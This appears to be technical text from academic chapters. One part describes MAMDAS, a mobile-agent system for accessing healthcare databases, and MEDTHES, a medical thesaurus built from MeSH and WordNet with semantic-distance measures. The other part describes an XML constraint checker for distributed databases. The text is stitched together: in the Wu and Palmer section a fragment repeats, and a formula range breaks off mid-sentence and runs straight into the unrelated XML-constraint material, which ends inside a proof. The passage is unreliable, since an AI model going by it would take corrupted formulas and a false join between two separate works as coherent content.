semistructured data. It relies on metadata describing the entities and the relationships between entities in a federated schema. These metadata appear to be created manually. While providing a new query language, this approach also raises questions about the accuracy of the metadata and extensibility of the system. The Query Integration System (QIS) of Marenco, Wang, Shepherd, Miller, and Nadkami (2004) is a database mediator framework that addresses robust data integration from continuously changing heterogeneous data sources in the biosciences. The QIS architecture is based on a set of distributed network-based servers, data-source servers, integration servers, and ontology servers that exchange metadata as well as mappings of both metadata and data elements to elements in an ontology. Metadata version difference determination coupled with the decomposition of stored queries is used as the basis for partial query recovery when the schema of data sources alters. The principal theme of this research is handling schema evolution. We developed a prototype of a mobile-agentbased mobile data-access system that deals with heterogeneous healthcare data-source integration and information retrieval (Jiao & Hurson, 2004). Our work differs from the previously mentioned research in several ways. First, MAMDAS utilizes the summary-schemas model for multidatabase organization (Bright et al., 1994). The hierarchical structure of SSM enables automated metadata population and improves search efficiency. Second, supporting user mobility is an emerging demand and it has not yet received enough attention in healthcare information-system research. We proposed to apply the mobile-agent technology to cope with this issue. Third, existing biomedical thesauri often demonstrate poor interoperability and reusability due to their nonstandard designs. We modified the MeSH thesaurus (Chevy, 2000) so that it complies with the ANSI/NISO (American National Standard Institute/National Information Standards Organization) Z39.19 monolingual
thesaurus-creation standard (NISO, 1994). In addition, most biomedical thesauri and ontologies are tailored to the needs of medical professionals and, thus, nonprofessionals often find them hard to use due to the lack of precise knowledge. We addressed this problem by augmenting MeSH terms with synonyms defined by a general English-lexicon thesaurus WordNet (Miller et al., 1990). Finally, MAMDAS can be coupled with thesauri or ontologies of different domains to provide an information-system infrastructure for various applications with minimal modification. In the following subsections, we briefly discuss the background information pertinent to the development of MAMDAS.
The Summary-Schemas Model The SSM consists of three major components: a thesaurus, local nodes, and summary-schemas nodes. Figure 1 depicts the structure of the SSM. The thesaurus defines a set of standard terms that can be recognized by the system, namely, global terms, and the categories they belong to. Each physical database (local nodes) may have its own dialect of those terms, called local terms. In order to share information among databases that speak in different dialects, each physical database maintains local-global schema metadata that map each local term into a global term in the format of “local term: global term.” Global terms are related through synonym, hypernym, and hyponym
links. The thesaurus also uses a semantic-distance metric (SDM) to provide a quantitative measurement of semantic similarity between terms. This feature allows for fine-grained semantic-based information retrieval. The cylinders and the ovals in Figure 1 represent local nodes and summary-schemas nodes, respectively. A local node is a physical database containing real data. A summary-schemas node is a logical database that contains metadata called summary schema, which store global terms and lists of locations where each global term can be found. The summary schema represents the schemas of the summary-schema node’s children in a more abstract manner; it contains the hypernyms of the input data. As a result, fewer terms are used to describe the information than the union of the terms in the input schemas. Figure 2 shows an example of the automated schema-abstraction process of four local terms, human face, ear, navel, and belly button, under the guidance of the MeSH thesaurus in a bottomup fashion. First, all local terms are mapped into global terms that are terms defined in MeSH. In the current prototype, this step is done by local database administrators manually. At SSM Level 1, the least common ancestors (immediate hypernyms) of the global terms are automatically identified by searching through the MeSH hierarchy: Head is the immediate hypernym of face and ear. Similarly, abdomen is the hypernym of umbilicus. At Summary Schemas Level 2, head
Figure 1. A summary-schemas model with M local nodes and N levels
Figure 2. An example of the schema-summarization process
and abdomen are further abstracted into body regions. Finally, at Level 3, body region is found to be a hyponym of 1 of the 15 categories defined in MeSH: anatomy. The SSM is a tightly coupled federated database solution and the administrator is responsible for determining the logical structure of it. In other words, when a node joins or leaves the system, the administrator is notified and changes to the SSM are made accordingly. Note that once the logical structure is determined, the schema-population process is automated and does not require the administrator’s attention. The major contributions of the SSM include preservation of the local autonomy, high expandability and scalability, short response time, and the resolution of imprecise queries. Because of the unique advantages of the SSM, we chose it as our underlying multidatabase organization model.
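A small sketch may help make the bottom-up abstraction step concrete. The following Python fragment assumes a toy slice of the MeSH hierarchy and rolls the local terms of Figure 2 up to the anatomy category; the data structures are illustrative assumptions, not MAMDAS code.

# Toy hypernym hierarchy and local-to-global term mappings (assumed for illustration).
HYPERNYM = {
    "face": "head", "ear": "head",
    "umbilicus": "abdomen",
    "head": "body regions", "abdomen": "body regions",
    "body regions": "anatomy",
}
LOCAL_TO_GLOBAL = {
    "human face": "face", "ear": "ear",
    "navel": "umbilicus", "belly button": "umbilicus",
}

def summarize(terms):
    """Replace a set of global terms by their immediate hypernyms."""
    return {HYPERNYM.get(t, t) for t in terms}

level0 = {LOCAL_TO_GLOBAL[t] for t in ["human face", "ear", "navel", "belly button"]}
level1 = summarize(level0)   # {'head', 'abdomen'}
level2 = summarize(level1)   # {'body regions'}
level3 = summarize(level2)   # {'anatomy'}
print(level0, level1, level2, level3)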
The Mobile-Agent Technology
An agent is a computer program that acts autonomously on behalf of a person or organization (Lange & Oshima, 1998). A mobile agent is an agent that can move through the heterogeneous network autonomously, migrate from host to host, and interact with other agents (Gray, Kotz, Cybenko, & Rus, 2000). Agent-based distributed application design is gaining prevalence, not because it is an application-specific solution (any application can be realized as efficiently using a combination of traditional techniques), but because it provides a single framework that allows a wide range of distributed applications to be implemented easily, efficiently, and robustly. Mobile agents have many advantageous properties (Lange & Oshima, 1998), and we highlight some of them here:
• Support disconnected operations: Mobile agents can roam the network and fulfill their tasks without the owner's intervention. Thus, the owner only needs to maintain the physical connection during submission and retraction of the agent. This asset makes mobile agents desirable in the mobile computing environment, where intermittent network connections are often inevitable.
• Balance workload: By migrating from the mobile device to the core network, the agents can take full advantage of the high bandwidth of the wired portion of the network and the high computation capability of servers and workstations. This feature enables mobile devices that have limited resources to provide functions beyond their original capability.
• Reduce network traffic: Mobile agents' migration capability allows them to handle tasks locally instead of passing messages between the involved databases. Therefore, fewer messages are needed to accomplish a task. Consequently, this reduces the chance of message losses and the overhead of retransmission.
Contemporary mobile-agent system implementations fall into two main groups: Java-based and non-Java-based. We argue that Java-based agent systems are better in that the Java language’s platform-independent features make it ideal for distributed application design. We chose the IBM Aglet Workbench SDK 2.0 (IBM Aglets Workbench, 1996) as the MAMDAS’ implementation tool.
DESIGN, FUNCTIONS, APPLICATION, AND PERFORMANCE EVALUATION OF MAMDAS AND MEDTHES
Mobile-Agent-Based Mobile Data-Access System
MAMDAS consists of four major logical components: the host, the administrator, the thesaurus, and the user (Jiao & Hurson, 2004). Figure 3 illustrates the overall architecture of MAMDAS. MAMDAS can accommodate an arbitrary number of hosts. A HostMaster agent resides on each host. A host can maintain any number and any type of nodes (local nodes or summary-schemas nodes) based on its resource availability. Each NodeManager agent monitors and manipulates a node. The HostMaster agent is in charge of
all the NodeManager agents on that host. Nodes are logically organized into a summary-schemas hierarchy. The system administrators have full control over the structure of the hierarchy. They can construct the structure by using the graphical tools provided by the AdminMaster agent. In Figure 3, the solid lines depict a possible summary-schemas hierarchy with the darkened node as the root and the arrows indicating the hierarchical relation. The ThesMaster agent acts as a mediator between the thesaurus server and other agents. The dashed lines with arrows indicate the communication between the agents. The DataSearchMaster agent provides a query interface, the data-search window, to the user. It generates a DataSearchWorker agent for each query. The three dash-dot-dot lines depict the scenario that three DataSearchWorker agents are dispatched to different hosts and work concurrently. Once the administrator decides the summaryschemas hierarchy, commands will be sent out to each involved NodeManager agent to build the structure. NodeManagers at the lower levels export their schemas to their parents. Parent nodes contact the thesaurus and generate an abstract version of their children’s schemas. When this process reaches the root, the MAMDAS is ready to accept queries. The user can start querying by launching the DataSearchMaster on his or her own device, which can be a computer attached to the network or a mobile device. The DataSearchMaster sends out two UserMessengers (not shown in the figure): one to the AdminMaster and one to the ThesMaster. The UserMessengers will return to the DataSearchMaster with the summary-schemas hierarchy and the category information. The DataSearchMaster then creates a data-search window that shows the user the summary-schemas hierarchy and the tree structure of the category. The user can enter the keyword, specify the preferred semantic distance, choose a category, and select a node to start the search. After the user clicks on the “Submit” button, the DataSearchMaster
Figure 3. An overview of the MAMDAS system architecture
packs the inputs, creates a DataSearchWorker, and passes the inputs to it as parameters. Since the DataSearchMaster creates a DataSearchWorker to handle each query, the user can submit multiple queries concurrently. Once dispatched, the DataSearchWorker can intelligently and independently accomplish the search task by making local decisions without the owner’s interference. During the query execution, the DataSearchWorker may generate DataSearchSlaves by cloning itself. The slaves can then work in parallel and report results to their creator. Figure 4 describes the search algorithm. One of the major advantages of the MAMDAS framework is that it supports database heterogeneity and geographical distribution transparency. It provides the users with a uniform access interface. This property of MAMDAS significantly eases the
Figure 4. The search algorithm

Set all child nodes to be unmarked;
WHILE (NOT (all terms are examined OR all child nodes are marked))
    IF (term is of interest)
        Mark all the child nodes that contain this term;
    ELSE
        CONTINUE;
    END IF
END WHILE
IF (no marked child node)
    Go to the parent node of the current node and repeat the search algorithm
    (if a summary-schema term of the parent node only exists on the current node, we can skip this term);
ELSE
    Create a DataSearchSlave for each marked child node;
    Dispatch the slaves to the destinations and repeat the search algorithm;
END IF
use of the system and makes it possible for users with limited computer skills to benefit from it.
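For readers who prefer code to pseudocode, the following Python sketch captures the routing logic of Figure 4, with agent cloning and dispatch reduced to recursive calls over an assumed in-memory node tree. It is an illustration of the idea under those assumptions, not the Aglets-based implementation.

# Sketch of the summary-schema search; Node and its fields are assumed structures.
from dataclasses import dataclass, field
from typing import List, Optional

@dataclass
class Node:
    summary_schema: set                             # global terms visible at this node
    children: List["Node"] = field(default_factory=list)
    parent: Optional["Node"] = None
    data: dict = field(default_factory=dict)        # local node only: term -> records

def search(node: Node, term: str, results: list) -> None:
    if not node.children:                           # local node: fetch matching records
        results.extend(node.data.get(term, []))
        return
    marked = [c for c in node.children if term in c.summary_schema]
    if not marked and node.parent is not None:      # term not covered here: go up a level
        search(node.parent, term, results)
        return
    for child in marked:                            # one "DataSearchSlave" per marked child
        search(child, term, results)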
A Medical Thesaurus: MEDTHES
The quality of the thesaurus is critical to the effectiveness of MAMDAS because it provides semantic-similarity measures to assist users in performing imprecise queries, in which the query term differs from the indexing term of a document. The proliferation of biomedical research and the public demand for e-healthcare systems have stimulated the development of biomedical thesauri. Several examples include MeSH (Chevy, 2000), the Unified Medical Language System (UMLS; McCray & Nelson, 1995), and the Systematized Nomenclature of Medicine (SNOMED; Spackman, Campbell, & Cote, 1997). While the existing medical thesauri have helped immensely in information categorization, indexing, and retrieval, two major problems remain:
• Their designs do not follow any international or national thesaurus standard, and therefore they could result in poor interoperability and reusability.
• They do not provide information regarding the semantic similarities among terms; thus, users are required to possess precise knowledge of the controlled vocabulary in order to make effective use of the thesaurus.
In order to alleviate these problems, we implemented a new medical thesaurus MEDTHES based on the medical thesaurus MeSH (Chevy, 2000) and the English-language thesaurus WordNet (Miller et al., 1990). It can be used as either a stand-alone thesaurus or an integral part of MAMDAS. In this subsection, we (a) briefly outline the ANSI/NISO standard for thesauri construction, (b) describe the two thesauri that have served as the foundation of MEDTHES, MeSH, and WordNet, (c) explain the concept of semantic similarity, (d) present the
implementation of MEDTHES, (e) demonstrate the functions provided by MEDTHES as a standalone thesaurus, and (f) show the integration of MEDTHES with MAMDAS.
The ANSI/NISO Z39.19 Standard The ANSI/NISO Z39.19 standard (NISO, 1994), entitled American National Standard Guidelines for the Construction, Format, and Management of Monolingual Thesauri, was developed by NISO and approved by ANSI. It provides guidelines for the design and use of thesauri, including rules for term selection, thesaurus structure, relation definitions, and thesaurus maintenance. Three types of semantic relationships between terms are distinguished in this standard: equivalence, hierarchical, and related. The equivalence relation establishes the link between synonyms, the hierarchical relationship provides links between terms that reflect general concepts (broader terms) and those that represent more specific information (narrower terms), and the related relationship exists among terms that have similar meanings or are often used in the same context but do not have hierarchical relationships. The design of MEDTHES follows this standard.
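The three relationship types can be summarized in a small data model. The sketch below uses the conventional BT/NT/RT and USE/UF labels; the field names and sample entries are illustrative assumptions, not the MEDTHES schema.

# A minimal data-model sketch of Z39.19-style term relationships (assumed names).
from dataclasses import dataclass, field
from typing import Set

@dataclass
class ThesaurusTerm:
    label: str
    use: str = ""                                      # equivalence: non-preferred -> preferred term
    used_for: Set[str] = field(default_factory=set)    # equivalence, inverse of USE
    broader: Set[str] = field(default_factory=set)     # hierarchical (BT)
    narrower: Set[str] = field(default_factory=set)    # hierarchical (NT)
    related: Set[str] = field(default_factory=set)     # associative (RT)

navel = ThesaurusTerm("Navel", use="Umbilicus")
umbilicus = ThesaurusTerm("Umbilicus",
                          used_for={"Navel", "Belly button"},
                          broader={"Abdomen"})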
MeSH The MeSH (Chevy, 2000) thesaurus is the standardized vocabulary developed by the National Library of Medicine for indexing, cataloging, and searching the medical literature. Currently, it contains approximately 22,000 terms (called descriptors) that describe the biomedical concepts used in health-related databases such as MEDLINE (MEDLINE, 2005), which is an online bibliographic database of medicine, nursing, health services, and so forth. All descriptors in MeSH are organized into 15 categories. Each category is then further divided into more specific subcategories. Within each category, descriptors are organized in a hierarchical fashion of up to 11 levels. In addition
to the hierarchical structure, MeSH uses “Entry Term” or “See” references to indicate semantic relations such as synonyms, near synonyms, and related concepts of some terms. Although MeSH is comprehensive and well maintained, it has several drawbacks. First, the synonymous relationship is not clearly listed and not differentiated from the related-term relation in MeSH. Second, the design of MeSH does not follow the ANSI thesaurus standard, which may result in poor interoperability and reusability. Third, MeSH is tailored to the needs of medical professionals. Nonprofessionals often find it hard to perform queries due to the lack of precise knowledge. For instance, a nonprofessional would use search terms such as navel and belly button instead of the official term umbilicus when submitting a query. Unfortunately, the query will fail because these terms are not defined in MeSH. We addressed this problem by augmenting MeSH with the well-defined synonyms found in WordNet, which we will discuss next.
WordNet WordNet is an online thesaurus that models the lexical knowledge of the English language (Miller et al., 1990). It organizes English nouns, verbs, adjectives, and adverbs into synonym sets, called synsets. In other words, a synset is a list of synonymous terms. Each term in WordNet may have one or more meanings, and each meaning has a synset. Different synsets are connected through hierarchical relationships. In summary, WordNet is comprehensive and designed with the goal to include every English word; it makes a number of fine-grained distinctions among word meanings. Thus, we decided to take advantage of the well-defined synonyms of WordNet and use them to complement the MeSH thesaurus.
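As an illustration of this augmentation step, the following sketch collects WordNet synonyms for a lay term using NLTK's WordNet interface and attaches them to a MeSH-style entry. The entry structure is an assumption made for the example, and this is not the authors' code; it only shows the idea.

# Requires the WordNet corpus: import nltk; nltk.download('wordnet')
from nltk.corpus import wordnet as wn

def wordnet_synonyms(term: str) -> set:
    """Collect lemma names from every WordNet synset of the term."""
    names = set()
    for synset in wn.synsets(term.replace(" ", "_")):
        for lemma in synset.lemma_names():
            names.add(lemma.replace("_", " ").lower())
    return names - {term.lower()}

mesh_entry = {"descriptor": "Umbilicus", "entry_terms": set()}   # assumed entry structure
mesh_entry["entry_terms"] |= wordnet_synonyms("navel")
# e.g., adds informal synonyms such as "belly button", "omphalos", "umbilicus"
print(mesh_entry)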
Semantic Similarity Synonyms and related terms obtained from a thesaurus are often used in query expansion for the purpose of improving the effectiveness of information retrieval (Shiri, Revie, & Chowdhury, 2002). However, in order to improve the quality of document ranking, a more fine-grained measure is needed to describe the degree of semantic similarity, or more generally, the relatedness between two lexically expressed concepts (Budanitsky & Hirst, 2001). Naturally, semantic distance is the inverse of semantic similarity. For example, the semantic distance between synonyms can be defined as zero, and that between antonyms can be defined as infinite. If a thesaurus provides functions that calculate the semantic similarity between terms, the users can perform fine-tuned queries by limiting the scope of the search via the constraint of semantic distance between the keyword and the search results. The user can indicate how closely the returned terms should be related to the keyword (searched term) by selecting preferred semanticdistance values. Two main categories of algorithms for computing the semantic distance between terms organized in a hierarchical structure (e.g., WordNet) have been proposed in the literature: distancebased approaches and information-content-based approaches. The general idea behind the distancebased algorithms (Leacock & Chodorow, 1998; Rada, Mili, Bicknell, & Blettner, 1989; Wu & Palmer, 1994) is to find the shortest path between two terms based on the number of edges, and then translate this distance into semantic distance. Information-content-based approaches (Jiang & Conrath, 1997; Rada et al.) are inspired by the perception that pairs of words that share many common contexts are semantically related. Thus, the basic idea of these methods is to quantify the frequency of the co-occurrences of words within various contexts.
In order to avoid the potential bias introduced by context selection, we chose to implement three distance-based algorithms in the MEDTHES prototype: the edge-counting algorithm (Rada et al., 1989), the Leacock and Chodorow (1998) algorithm, and the Wu and Palmer (1994) algorithm.

The Edge-Counting Algorithm
In the edge-counting algorithm, the semantic distance is defined as the number of edges (nodes) along the shortest path between any two terms.

The Leacock and Chodorow Algorithm
The relatedness measure proposed by Leacock and Chodorow (1998) also relies on the shortest path between two terms, t1 and t2. The relatedness between two terms, t1 and t2, is calculated as follows:

relatedness(t1, t2) = -log( len(t1, t2) / (2D) )    (1)

where relatedness(t1, t2) is the similarity of terms t1 and t2, len(t1, t2) is the length of the shortest path between the two terms (using edge counting), and D is the maximum depth of the structure. Semantic distance is the inverse of relatedness(t1, t2), that is, 1 / relatedness(t1, t2).
The Wu and Palmer Algorithm
The Wu and Palmer (1994) algorithm uses the term score to define how two terms are related to each other. It measures the score by considering the depth of the two terms t1 and t2 in the tree structure, along with the depth of the LCA (least common ancestor). The formula used to calculate the score is shown in Equation 2:

score(t1, t2) = 2 * N3 / (N1 + N2 + 2 * N3)    (2)

where N1 is the length of the shortest path from t1 to the LCA, N2 is the length of the shortest path from t2 to the LCA, and N3 is the length of the shortest path from the LCA to the root.
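The three measures are easy to prototype. The following Python sketch implements them over a toy parent map standing in for the MeSH/WordNet hierarchy; the hierarchy and the depth value are assumptions made for illustration, not MEDTHES code.

import math

# Toy hierarchy: child -> parent (assumed slice of MeSH).
PARENT = {"face": "head", "ear": "head", "head": "body regions",
          "umbilicus": "abdomen", "abdomen": "body regions",
          "body regions": "anatomy", "anatomy": None}

def path_to_root(term):
    path = [term]
    while PARENT.get(path[-1]) is not None:
        path.append(PARENT[path[-1]])
    return path

def shortest_path_len(t1, t2):                  # edge-counting distance
    p1, p2 = path_to_root(t1), path_to_root(t2)
    lca = next(t for t in p1 if t in p2)        # least common ancestor
    return p1.index(lca) + p2.index(lca)

def leacock_chodorow(t1, t2, depth):            # Equation 1
    return -math.log(max(shortest_path_len(t1, t2), 1) / (2 * depth))

def wu_palmer(t1, t2):                          # Equation 2
    p1, p2 = path_to_root(t1), path_to_root(t2)
    lca = next(t for t in p1 if t in p2)
    n1, n2 = p1.index(lca), p2.index(lca)
    n3 = len(path_to_root(lca)) - 1             # LCA-to-root path length
    return 2 * n3 / (n1 + n2 + 2 * n3)

print(shortest_path_len("face", "umbilicus"))                 # 4 edges via "body regions"
print(round(leacock_chodorow("face", "umbilicus", depth=3), 2))
print(round(wu_palmer("face", "umbilicus"), 2))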
to the LCA, N2 is the length of the shortest path from t2 to the LCA, and N3 is the length of the shortest path from the LCA to the root. The range of relatedness is 0< score(t1,t2) 40000. (//S1:PATIENTS, (./PATIENT,[ssn=./SSN,healthplan=./healthplan])), (//S1:CASES,(./CASE,[caseid=./CaseId,ssn=./ SSN])), (//S2:CLAIMS,(./CLAIM,[caseid=./CaseId,type=./ type])), healthplan = ‘B’,type = ‘Emergency’.
For the example contained in Figure 2, C1 is satisfied, but C2 is violated. C1 is satisfied for
the healthdb.xml as one of the arithmetic literals amount (node 25, value = 25000) > 40000 returns false and hence the whole conjunction for C1 evaluates to false. C2 is violated as the conjunction for C2 evaluates to true. Arithmetic literal, healthplan (node 7, value = ‘B’) = ‘B’ evaluates to true and similarly, type (node 27, value=’Emergency’) = ‘Emergency’ evaluates to true and hence the whole conjunction for C2 evaluates to true. We also note that keys introduced in (Chen et al., 2002a), can be expressed using our representation. Consider a key constraint, C3, which states that within the context of PATIENTS, a PATIENT is uniquely identified by SSN. Using the notation of (Chen et al., 2002a), C3 can be expressed as follows:
C3:- (/HEALTHDB/S1:PATIENTS, (./PATIENT, {./SSN}))

A key constraint such as C3 could be expressed in our notation (a functional dependency) as two XConstraints:

C31:- (//S1:PATIENTS, (./PATIENT,[ssn=./SSN,name1=./PName])),
(//S1:PATIENTS, (./PATIENT,[ssn=./SSN,name2=./PName])),
name1 ≠ name2.

This has some similarity with the notion of template dependencies (Elmasri & Navathe, 2003), wherein we can represent any general constraints in relations.

XCONSTRAINT CHECKER

We first give the assumptions of the system and then present the detailed architecture of the XConstraint Checker.

Assumptions

The XConstraint Checker relies on the fundamental concepts (XConstraint, XUpdate) introduced in the second section. The assumptions we make for the XConstraint Checker are:

1. A restricted set of the XUpdate language is considered, without losing the generality of the approach. We permit the following SubOps: DELETE $child, INSERT $content [BEFORE | AFTER $child], and REPLACE $child with $content. The optional [BEFORE | AFTER $child] is applicable for an ordered execution model of the XML tree. Also, we restrict the updates to elementary updates. An elementary update considers: (1) updates occurring only on one single node of an XML tree and (2) updates with only one SubOp at a time. However, note that any update can be equivalently transformed into a set of elementary updates; therefore, we do not lose the generality of the approach.

2. The XML constraint representation follows from the second section.
XConstraint Checker Architecture

The internal architecture of the XConstraint Checker is presented in Figure 3. The XConstraint Checker interfaces with the rest of the system as shown in Figure 1. The XConstraint Checker consists of the following modules (a skeleton of these modules is sketched after this list):

• XUpdate Parser: parses an XUpdate statement input by the user and identifies the XML Node Value List (XNVL) involved in the XUpdate.
• XMetadatabase: stores and acts as a repository of global XConstraints.
• XMeta Extractor: extracts only the global XConstraints affected by the XUpdate.
• XConstraint Decomposer: decomposes a global XConstraint into a set of sub XConstraints to be validated locally on remote sites.
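As a reading aid, the following Python skeleton sketches one way the four modules could be wired together; the class, method, and parameter names are hypothetical, and the per-module logic is deliberately left abstract rather than reproducing the actual implementation.

# Hypothetical skeleton of the XConstraint Checker pipeline (Steps 1-4 below).
# Names and signatures are illustrative, not taken from the original system.

class XConstraintChecker:
    def __init__(self, xmetadatabase, local_evaluator):
        self.xmetadatabase = xmetadatabase      # repository of global XConstraints
        self.local_evaluator = local_evaluator  # callable: ships a sub XConstraint to its site, returns True/False

    def parse_xupdate(self, xupdate_text):
        """XUpdate Parser: return the XNVL (target node plus attribute/value pairs)."""
        raise NotImplementedError

    def extract_affected(self, xnvl):
        """XMeta Extractor: return the XCST, i.e. pairs (Ci, list of sites) for the
        global XConstraints whose paths intersect the update path."""
        raise NotImplementedError

    def decompose(self, constraint, sites, xnvl):
        """XConstraint Decomposer: return one sub XConstraint Cij per site Sj."""
        raise NotImplementedError

    def is_safe(self, xupdate_text):
        """The XUpdate may be executed only if no affected constraint is violated;
        a constraint Ci is violated iff the conjunction of its Cij's is true."""
        xnvl = self.parse_xupdate(xupdate_text)                         # Step 2
        for constraint, sites in self.extract_affected(xnvl):           # Step 3
            sub_constraints = self.decompose(constraint, sites, xnvl)   # Step 4
            if all(self.local_evaluator(c) for c in sub_constraints):
                return False
        return True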
The overall process of constraint checking is explained in the following four steps (see Figure 3).
Step 1

The user issues an XUpdate statement on one of the sites. Figure 4 gives the initial XML database state before the XUpdate statement is executed. For example, the user issues an XUpdate statement, XU1, on site S2:
XU1 = FOR $cl in document("healthdb.xml")/HEALTHDB/S2:CLAIMS
UPDATE $cl {
  INSERT <CLAIM>
           <CaseId>1</CaseId>
           <ClaimDate>03/05/2004</ClaimDate>
           <Amount>25000</Amount>
           <Type>Emergency</Type>
         </CLAIM>
}
Figure 5 gives the modified tree representation of the healthdb.xml, if the update is successful. The nodes affected by the XUpdate are shown in filled circles.
Figure 4. Tree representation of healthdb.xml before XUpdate

Figure 5. Modified tree representation of healthdb.xml, if XUpdate is successful

Step 2 (XUpdate Parser)

The XUpdate Parser parses the given XUpdate statement and identifies the XML node being modified. The output from this step is the XML Node Value List (XNVL):

XNVL = N(a1=v1, a2=v2, …, an=vn)

where N is the node being updated and is obtained from the $binding in the XUpdate syntax; v1, v2, …, vn are the values being updated, corresponding to the attributes a1, a2, …, an; and a1, a2, …, an are either the XML sub-elements or XML attributes being updated and are obtained from the content of the XUpdate statement. For the running example:

XNVL = {/HEALTHDB/S2:CLAIMS/CLAIM(CaseId = 1, ClaimDate = '03/05/2004', Amount = 25000, Type = 'Emergency')}
Step 3 (XMeta Extractor)

Let XU↓ denote the path involved in executing the XUpdate statement XU on the XML tree T. Similarly, C↓ denotes the path involved in defining the constraint C. We say that an XUpdate XU might violate a constraint C if XU↓ ∩ C↓ is not empty. For the running example, XU1↓ corresponds to the nodes {20,21,22,23,24,25,26,27,28}, C1↓ matches {3,4,7,8,12,13,14,15,21,22,25,26,31,32,37,38}, and C2↓ matches {3,4,7,8,12,13,14,15,21,22,27,28} (refer to Figure 5). XU1↓ ∩ C1↓ is not empty and XU1↓ ∩ C2↓ is also not empty; hence, both constraints might be violated by the update statement. If a global schema or a global DTD is given, we can identify the list of global XConstraints that might be violated by simply consulting the global DTD. The XMeta Extractor identifies the list of constraints affected by the XUpdate and constructs the XConstraint Source Table (XCST). XCST(Ci) = <Ci, list(Sj)>, where Ci is the constraint identifier and list(Sj) is the list of sites affected by Ci. For the running example, the XCST is given in Figure 6. The XMeta Extractor sends the XCST to the XConstraint Decomposer.
Figure 6. XCST

Ci    list(Sj)
C1    (S1, S2, S3)
C2    (S1, S2)
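To make the "might violate" test of Step 3 concrete, the following Python sketch reuses the node identifiers quoted above for the running example; the helper names are ours, and a real implementation would derive the node sets from the XML tree and the constraint definitions.

# Node sets from the running example (Figure 5), as quoted in the text.
XU1_NODES = {20, 21, 22, 23, 24, 25, 26, 27, 28}
CONSTRAINT_NODES = {
    "C1": {3, 4, 7, 8, 12, 13, 14, 15, 21, 22, 25, 26, 31, 32, 37, 38},
    "C2": {3, 4, 7, 8, 12, 13, 14, 15, 21, 22, 27, 28},
}
CONSTRAINT_SITES = {"C1": ["S1", "S2", "S3"], "C2": ["S1", "S2"]}

def might_violate(update_nodes, constraint_nodes):
    """An XUpdate might violate constraint C iff XU-path ∩ C-path is not empty."""
    return bool(update_nodes & constraint_nodes)

def build_xcst(update_nodes):
    """XCST(Ci) = <Ci, list(Sj)> for every constraint possibly affected."""
    return {ci: CONSTRAINT_SITES[ci]
            for ci, nodes in CONSTRAINT_NODES.items()
            if might_violate(update_nodes, nodes)}

print(build_xcst(XU1_NODES))   # {'C1': ['S1', 'S2', 'S3'], 'C2': ['S1', 'S2']}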
Step 4 (XConstraint Decomposer)

The XConstraint Decomposer generates the set of sub XConstraints Cij on the basis of the locality of sites. Cij is the sub XConstraint corresponding to constraint Ci and site Sj. We present the algorithmic description of generating the Cij's in the next section. For the running example, C11, C12, C13, C21, and C22 are generated. The values of the sub XConstraints are also given in the next section.
XCONSTRAINT DECOMPOSER

The basic idea of the XConstraint Decomposer is to decompose a global constraint into a conjunction of sub XConstraints, where each conjunct represents the constraint check as seen from each individual site. Given an XUpdate statement, a brute-force approach would be to go ahead and update the XML document and then check for constraint violations. However, we want to be able to check for constraint violations without updating the database. In other words, the XUpdate is carried out only if it is a non-constraint violator. Thus, we avoid any potential rollbacks. Our idea here is to scan through a global XConstraint Ci and an XUpdate XU and then generate a conjunction of sub XConstraints Cij. The value of each conjunct (each Cij) is either false or true. If the overall value of the conjunction is true, constraint Ci is violated (from Theorem 4.1). Algorithm 1 gives the constraint decompositions (the Cij's) corresponding to a global constraint Ci and an XUpdate statement involving an insert statement. Algorithm 1 takes as input the XML Node Value List, XNVL (Step 2 of the third section), and the XConstraint Source Table, XCST (Step 3 of the third section), and gives as output the sub XConstraints. The XNVL (line 1) identifies the node N being inserted with the values v1…vn corresponding to the attribute names a1…an (similar to the XUpdate syntax). The update is occurring on site Sm. The outer for loop variable i (line 4) loops through all
Algorithm 1
1:  INPUT: (a) XNVL = $Sm:N(a1=v1, a2=v2, …, an=vn) on XML tree T   // Note: the insert is occurring on site Sm
2:         (b) XCST = <<C1, (S11, …, S1n1)>, …, <Cq, (Sq1, …, Sqnq)>>
3:  OUTPUT: list of sub XConstraints for each Ci affected by the XUpdate XU
4:  for each i in {1…q} do
5:    for each j in {1…ni} do
6:      let Sj:(Q1,(Q1',[X1])), …, Sj:(Qr,(Qr',[Xr])) be the XML literals and A be all arithmetic literals associated with Sj
7:      if (j ≠ m) then
8:        Cij = for $var1 in document("T")Q1.Q1',
9:              for $var2 in document("T")Q2.Q2', …,
10:             for $varr in document("T")Qr.Qr'
11:             where <cond>
12:             return 1
13:        <cond> is obtained by joining variables with the same name appearing in the XML literals and including any arithmetic conditions
14:     else if (j = m) then   /* the site where the update is occurring */
15:       if (there exist variables in A that do not appear among X1…Xr) then
16:         for each variable ν in A that does not appear among X1…Xr do
17:           let k be the site where ν appears in one of the XML literals, (Sk:Q(Q'[X]))
18:           IPikd = for $ν in document("T")Q.Q'
19:                   where <cond>
20:                   return {$ν/tν}
21:           tν is the path expression corresponding to $ν in the XML literal and is obtained from X1…Xr and X; d indexes the intermediate predicate
22:         end for
23:       end if
24:       Cij = return 1 if (<val> and A') else return 0
25:       <val> is obtained from XNVL and (logical and) X1…Xr; A' is A with the IPs replacing the corresponding variables in A
26:     end if
27:   end for
28: end for
the constraints C1…Cq affected by the XUpdate. The inner for loop variable j (line 5) loops through each site in <(S11, S12, …, S1n1), …, (Sq1, Sq2, …, Sqnq)> for each constraint Ci. Inside the for loop (lines 4-28), all the sub constraints Cij are generated. X1…Xr (line 6) denotes a vector of user-defined variable bindings v
= path expression t in an XML literal (Definition 2.2). Q1.Q1' (line 8) denotes the conjunction of path expressions Q1 and Q1'. A critical feature of the algorithm is the generation of intermediate predicates, IPs (line 18). IPs are generated only at the site where the update is occurring. For each variable
that occurs in a different site, we generate an IP. Conceptually, an IP denotes information that needs to be shared from a different site; implementation-wise, an IP is an XQuery returning the value of the variable from a different site. IPikd denotes the dth intermediate predicate corresponding to constraint Ci and site Sk.

Theorem 4.1: The conjunction of sub XConstraints,
Cij's, generated from Algorithm 1 conclusively determines whether an XUpdate statement violates a global XConstraint Ci.

Proof sketch:

1. Given an XUpdate statement occurring on site Sm and a global constraint Ci, Ci can be written as a conjunction of XML literals and arithmetic literals. If the whole conjunction evaluates to false, Ci is satisfied (from Definition 2.4). Each sub XConstraint Cij needs to achieve the exact same result as the XML literals and arithmetic literals corresponding to site Sj. At this point, Cij falls into one of two cases, depending on the site Sj.

